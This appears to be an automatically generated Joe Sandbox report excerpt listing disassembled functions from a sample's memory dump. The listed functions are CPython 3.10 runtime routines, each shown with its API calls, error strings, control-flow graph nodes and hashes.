                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_$Unicode_$AllocDefaultFromGenericInternItemPlaceStringType_$ContainsDescr_Err_FormatHashObject_Wrapper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2113661857-0
                                                                                                                                                                                                      • Opcode ID: c6f61ea35dbc34526f98bc63dee5ce1d393326e281cf8cc96d8de7cf13699c7e
                                                                                                                                                                                                      • Instruction ID: 9af0c6bce40d9e92c7b7a17140647510856404f6c97fa90151c60a9120a3d5fd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6f61ea35dbc34526f98bc63dee5ce1d393326e281cf8cc96d8de7cf13699c7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2271A370A016029BEF24CFA9DD80F9AB7E4AF0422DF1005BDD955E7B55EB30DA14CBA1
                                                                                                                                                                                                      Function 6C58E0D0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 165threadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_allocate_lock.PYTHON310 ref: 6C58E138
                                                                                                                                                                                                        • Part of subcall function 6C5BC510: CreateSemaphoreA.KERNEL32(00000000,00000000,000186A0,00000000), ref: 6C5BC547
                                                                                                                                                                                                        • Part of subcall function 6C5BC510: InitializeCriticalSection.KERNEL32(00000000), ref: 6C5BC55C
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(?), ref: 6C58E149
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(000000FF), ref: 6C58E288
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,failed to get an interpreter ID), ref: 6C58E2B7
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58E30E
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(FFFFFFFF,00000001,00000000), ref: 6C58E32D
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C58E334
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$Err_Semaphore$CreateEnterInitializeLeaveMemoryReleaseStringThread_acquire_lock_timedThread_allocate_lock
                                                                                                                                                                                                      • String ID: @bJl$cpython.PyInterpreterState_New$failed to get an interpreter ID
                                                                                                                                                                                                      • API String ID: 1663566055-1548959211
                                                                                                                                                                                                      • Opcode ID: f353c5c1b78a0b6cfcee780af2b574b14724f8d21b0338c5e36e0fce3e542d34
                                                                                                                                                                                                      • Instruction ID: ffa8cfdab596d0ab48e62680e034d3f943270020a54767157c07f7b62e122968
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f353c5c1b78a0b6cfcee780af2b574b14724f8d21b0338c5e36e0fce3e542d34
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00718C70A05B159FD7119F28C908796FBF0FF86318F10862DE8289A790E7B4A558CFD5
                                                                                                                                                                                                      Function 6C550C70 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_CheckFunctionResult.PYTHON310(?,?,00000000,00000000,?,?,80000001,00000000), ref: 6C550CB0
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,?,?,00000001,00000000), ref: 6C550CC8
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get), ref: 6C550CDB
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(bad argument type for built-in operation), ref: 6C550D2C
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,bad argument type for built-in operation), ref: 6C550D36
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,00000000,00000000,00000000), ref: 6C550D6F
                                                                                                                                                                                                      • PyList_Append.PYTHON310(00000000,?), ref: 6C550D9D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C550D27
                                                                                                                                                                                                      • argument must be callable, xrefs: 6C550D5A
                                                                                                                                                                                                      • PyThreadState_Get, xrefs: 6C550CD6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Object$AppendCallCheckError_FatalFromFunctionList_MakeObject_ResultStringTstateUnicode_
                                                                                                                                                                                                      • String ID: PyThreadState_Get$argument must be callable$bad argument type for built-in operation
                                                                                                                                                                                                      • API String ID: 3037898171-3004562976
                                                                                                                                                                                                      • Opcode ID: 5bf5e4391e1301299cf0ad8a981c1e0ca8c1cca1a2e909ab2f241a02f1e5d280
                                                                                                                                                                                                      • Instruction ID: 447afec3dd202ed19472ad53d9d6abf6b90a49e6facf5fb2c91ebdfd5074d7d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bf5e4391e1301299cf0ad8a981c1e0ca8c1cca1a2e909ab2f241a02f1e5d280
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75310672700208ABD7109A49EC41FA777A8DB9232DF54016AFD1897B81E761BC5487F2
                                                                                                                                                                                                      Function 6C4A0760 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 125COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 685 6c4a0760-6c4a077a PyModule_GetNameObject 686 6c4a085c-6c4a0865 685->686 687 6c4a0780-6c4a0783 685->687 688 6c4a0791-6c4a07a0 PyUnicode_AsUTF8AndSize 687->688 689 6c4a0785-6c4a078e 687->689 688->686 690 6c4a07a6-6c4a07ae 688->690 689->688 692 6c4a07b0-6c4a07b4 690->692 693 6c4a0807-6c4a080c 690->693 692->693 696 6c4a07b6-6c4a07bb 692->696 694 6c4a080e 693->694 695 6c4a083f-6c4a0847 693->695 697 6c4a0810-6c4a0814 694->697 698 6c4a07bd-6c4a07d2 call 6c566230 696->698 699 6c4a07d3-6c4a07e8 696->699 697->695 700 6c4a0816-6c4a081b 697->700 706 6c4a07ea-6c4a07f8 call 6c566230 699->706 707 6c4a07f9-6c4a0804 memset 699->707 703 6c4a083a-6c4a083d 700->703 704 6c4a081d-6c4a0820 700->704 703->695 703->697 708 6c4a0822-6c4a0825 704->708 709 6c4a0874-6c4a0892 PyErr_Format 704->709 707->693 712 6c4a0828-6c4a0832 708->712 713 6c4a0866-6c4a086a 712->713 714 6c4a0834-6c4a0838 712->714 713->686 715 6c4a086c-6c4a0872 713->715 714->703 716 6c4a0848-6c4a0849 714->716 717 6c4a084e-6c4a0859 PyErr_Format 715->717 716->717 717->686
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyModule_GetNameObject.PYTHON310(?), ref: 6C4A076E
                                                                                                                                                                                                        • Part of subcall function 6C4A0A10: PyType_IsSubtype.PYTHON310(?,?,?,?,?,?,?,6C4A0773,?), ref: 6C4A0A2D
                                                                                                                                                                                                        • Part of subcall function 6C4A0A10: PyUnicode_FromString.PYTHON310(bad argument type for built-in operation), ref: 6C4A0A4A
                                                                                                                                                                                                        • Part of subcall function 6C4A0A10: _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,bad argument type for built-in operation), ref: 6C4A0A54
                                                                                                                                                                                                      • PyUnicode_AsUTF8AndSize.PYTHON310(-000000FF,00000000), ref: 6C4A0794
                                                                                                                                                                                                      • PyErr_NoMemory.PYTHON310 ref: 6C4A07C4
                                                                                                                                                                                                      • PyErr_NoMemory.PYTHON310 ref: 6C4A07EA
                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4A07FF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • module %s initialized with unknown slot %i, xrefs: 6C4A0876
                                                                                                                                                                                                      • execution of module %s raised unreported exception, xrefs: 6C4A0849
                                                                                                                                                                                                      • execution of module %s failed without setting an exception, xrefs: 6C4A086D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$MemoryObjectUnicode_$FromModule_NameSizeStringSubtypeType_memset
                                                                                                                                                                                                      • String ID: execution of module %s failed without setting an exception$execution of module %s raised unreported exception$module %s initialized with unknown slot %i
                                                                                                                                                                                                      • API String ID: 3111880337-3514548238
                                                                                                                                                                                                      • Opcode ID: 190c4984766080c0c8aa05ed6d1ca6a4ed7524ce9ed4456d829166d6cf2b6141
                                                                                                                                                                                                      • Instruction ID: d6316cba04b2f88917782a43ed7c552ba7868e1dded4fb6444ab478eaed61117
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 190c4984766080c0c8aa05ed6d1ca6a4ed7524ce9ed4456d829166d6cf2b6141
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E312632F012045BD614DAAAAC41E9677A8EB5133BF10073DEC29C3F90DB61E81686E5
                                                                                                                                                                                                      Function 6C569070 Relevance: 16.6, APIs: 11, Instructions: 138COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C535380), ref: 6C569097
                                                                                                                                                                                                      • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C56909C
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C5690A5
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000006), ref: 6C5690B1
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000068), ref: 6C5690D2
                                                                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 6C5690DB
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C5690E5
                                                                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5690F5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast_set_thread_local_invalid_parameter_handler$FileType_errno_get_osfhandlememset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 600442463-0
                                                                                                                                                                                                      • Opcode ID: 4b9d1b839b3ad7c0fd3e1cc02fd75e59302cca6d7ceb2b08a70d1c16ae1e8388
                                                                                                                                                                                                      • Instruction ID: 5689c4e0ee4d169e7dd4ca3b7961cb4ed316613c9b963b91bfa2c9c30913af67
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b9d1b839b3ad7c0fd3e1cc02fd75e59302cca6d7ceb2b08a70d1c16ae1e8388
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE41B832B001049BCF04EFB9DC846EEB7B5EF89235B15456EE90ADB780EB35D9098791
                                                                                                                                                                                                      Function 6C587F90 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 232COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 750 6c587f90-6c587fbe call 6c587790 753 6c587fcf-6c587fe1 call 6c48d1f0 750->753 754 6c587fc0-6c587fce 750->754 757 6c5882a6 753->757 758 6c587fe7-6c587ff9 call 6c48d1f0 753->758 759 6c5882ae-6c5882c6 757->759 758->757 763 6c587fff-6c588017 call 6c587b60 758->763 761 6c5882cb-6c5882d6 759->761 763->761 766 6c58801d-6c588023 763->766 767 6c588034-6c58803b 766->767 768 6c588025-6c588032 call 6c53b720 766->768 770 6c58805c-6c588063 767->770 771 6c58803d-6c58805a call 6c4725a0 767->771 768->767 776 6c588087-6c5880aa 768->776 774 6c5880ab-6c5880e5 770->774 775 6c588065-6c588085 call 6c4d99e0 770->775 771->770 771->776 781 6c5880f4-6c588115 call 6c5bb940 774->781 782 6c5880e7-6c5880ef 774->782 775->774 775->776 785 6c58811b-6c58812d call 6c548260 781->785 786 6c58827c-6c588282 781->786 782->759 791 6c588208-6c588228 785->791 792 6c588133-6c58814d _PyImport_FixupBuiltin 785->792 786->761 788 6c588284-6c588287 786->788 788->761 789 6c588289-6c5882a5 788->789 796 6c58822d-6c588237 791->796 794 6c588153-6c588160 PyModule_GetDict 792->794 795 6c5881f7-6c5881fa 792->795 794->795 798 6c588166-6c588184 call 6c47e5c0 794->798 795->791 797 6c5881fc-6c588205 795->797 796->786 799 6c588239-6c588240 796->799 797->791 805 6c588193-6c5881b1 PyDict_Copy 798->805 806 6c588186-6c58818e 798->806 799->786 801 6c588242-6c58824a call 6c587190 799->801 807 6c58824f-6c588251 801->807 805->795 808 6c5881b3-6c5881b6 805->808 806->796 809 6c588253-6c588276 807->809 810 6c588277 807->810 811 6c5881b8-6c5881c1 808->811 812 6c5881c4-6c5881df _PyDict_GetItemStringWithError 808->812 810->786 811->812 812->795 813 6c5881e1-6c5881f5 812->813 813->796
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C58AC59,?), ref: 6C587FD1
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C58AC59), ref: 6C587FE9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: List_
                                                                                                                                                                                                      • String ID: __import__$builtins$default
                                                                                                                                                                                                      • API String ID: 4215266370-3053659644
                                                                                                                                                                                                      • Opcode ID: ec4a12a69d5d3f3da1a54edfbb98b0b4b04a56c35424ad541c47d384113b8993
                                                                                                                                                                                                      • Instruction ID: a35bc68b8b1f541fa24de45db85633b763d23053d9f31fd96a9f67177286030d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec4a12a69d5d3f3da1a54edfbb98b0b4b04a56c35424ad541c47d384113b8993
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2691A270A0A7418FD701CF29DC41B9AB7F4EF84318F04466EE9599B6A1EB31E585CB83
                                                                                                                                                                                                      Function 6C4BC120 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 815 6c4bc120-6c4bc137 816 6c4bc2ab-6c4bc2b3 815->816 817 6c4bc13d-6c4bc140 815->817 817->816 818 6c4bc146-6c4bc158 817->818 819 6c4bc16b-6c4bc16d 818->819 820 6c4bc15a-6c4bc15c 818->820 823 6c4bc1ba-6c4bc1bc PyDescr_NewMethod 819->823 824 6c4bc16f-6c4bc181 PyCMethod_New 819->824 821 6c4bc162-6c4bc169 PyDescr_NewClassMethod 820->821 822 6c4bc265-6c4bc28f call 6c394cd0 _PyErr_SetString 820->822 826 6c4bc1c1-6c4bc1c3 821->826 823->826 827 6c4bc2a1-6c4bc2aa 824->827 828 6c4bc187-6c4bc19a PyType_GenericAlloc 824->828 832 6c4bc1c6 826->832 830 6c4bc19c-6c4bc19e 828->830 831 6c4bc1a1-6c4bc1aa 828->831 830->831 833 6c4bc1ca-6c4bc1cc 831->833 834 6c4bc1ac-6c4bc1b8 831->834 832->833 833->827 835 6c4bc1d2-6c4bc1d4 833->835 834->832 836 6c4bc1db-6c4bc1e9 PyUnicode_FromString 835->836 837 6c4bc1d6-6c4bc1d9 835->837 839 6c4bc1ef-6c4bc200 836->839 840 6c4bc290-6c4bc293 836->840 837->839 841 6c4bc202-6c4bc20f PyDict_SetDefault 839->841 842 6c4bc211-6c4bc21d PyDict_SetItem 839->842 840->827 843 6c4bc295-6c4bc29e 840->843 844 6c4bc220-6c4bc229 841->844 842->844 843->827 845 6c4bc22b-6c4bc22e 844->845 846 6c4bc23c-6c4bc23f 844->846 845->846 848 6c4bc230-6c4bc239 845->848 849 6c4bc24d-6c4bc252 846->849 850 6c4bc241-6c4bc24a 846->850 848->846 849->827 851 6c4bc254-6c4bc25a 849->851 850->849 851->816 852 6c4bc25c-6c4bc260 851->852 852->818
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyDescr_NewClassMethod.PYTHON310(?,?), ref: 6C4BC164
                                                                                                                                                                                                      • PyCMethod_New.PYTHON310(?,?,00000000,00000000), ref: 6C4BC175
                                                                                                                                                                                                      • PyType_GenericAlloc.PYTHON310(?,00000000), ref: 6C4BC18E
                                                                                                                                                                                                      • PyDescr_NewMethod.PYTHON310(?,?), ref: 6C4BC1BC
                                                                                                                                                                                                        • Part of subcall function 6C4702E0: PyType_GenericAlloc.PYTHON310(?,00000000,?,?,?,?,6C4BC1C1,?,?), ref: 6C470370
                                                                                                                                                                                                        • Part of subcall function 6C4702E0: PyUnicode_FromString.PYTHON310(?,?,?,?,?,?,?,?,00000000), ref: 6C47038D
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?,?,?,?,?,?,?,?,00000000), ref: 6C4BC1DD
                                                                                                                                                                                                      • PyDict_SetDefault.PYTHON310(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4BC202
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C4BC211
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73D6C0,method cannot be both class and static), ref: 6C4BC27E
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • method cannot be both class and static, xrefs: 6C4BC277
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$AllocDescr_Dict_Err_FromGenericMethodType_Unicode_$ClassDefaultItemMethod_Object
                                                                                                                                                                                                      • String ID: method cannot be both class and static
                                                                                                                                                                                                      • API String ID: 3269726295-1906920631
                                                                                                                                                                                                      • Opcode ID: a85e190424155e9c449b3b3a38cf85733936dc03dfe27c432edd3fa33c583455
                                                                                                                                                                                                      • Instruction ID: 08510274e704571a1b637fc2ce1ecc2ff317a339e74423ffb83f14349a385eab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a85e190424155e9c449b3b3a38cf85733936dc03dfe27c432edd3fa33c583455
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB412971A416019BD714DAAADCC0F9773E4AF81339F144738F828E6B90E774D8068BE2
                                                                                                                                                                                                      Function 6C467EA0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 144COMMON
